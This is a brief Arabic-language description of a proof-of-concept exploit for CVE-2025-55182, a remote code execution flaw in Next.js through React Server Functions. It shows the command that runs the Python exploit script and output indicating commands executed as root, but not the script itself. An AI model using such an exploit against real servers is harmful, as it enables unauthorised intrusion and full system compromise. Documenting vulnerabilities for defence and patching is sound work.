
استغلال إثبات المفهوم لـ CVE-2025-55182 يتيح تنفيذ التعليمات البرمجية عن بُعد في Next.js عبر React Server Functions. يتضمن نص Python يوضح حقن الأوامر ويعيد مخرجات على مستوى النظام.
ثغرة تنفيذ الأوامر عن بعد (RCE) في Next.js عبر دوال خادم React
❯ python3 cve-2025-55182-exploit.py
0:{"a":"$@1","f":"","b":"3OmR5Ifk9dmFJ1coB7-Wc"}
1:E{"digest":"uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"}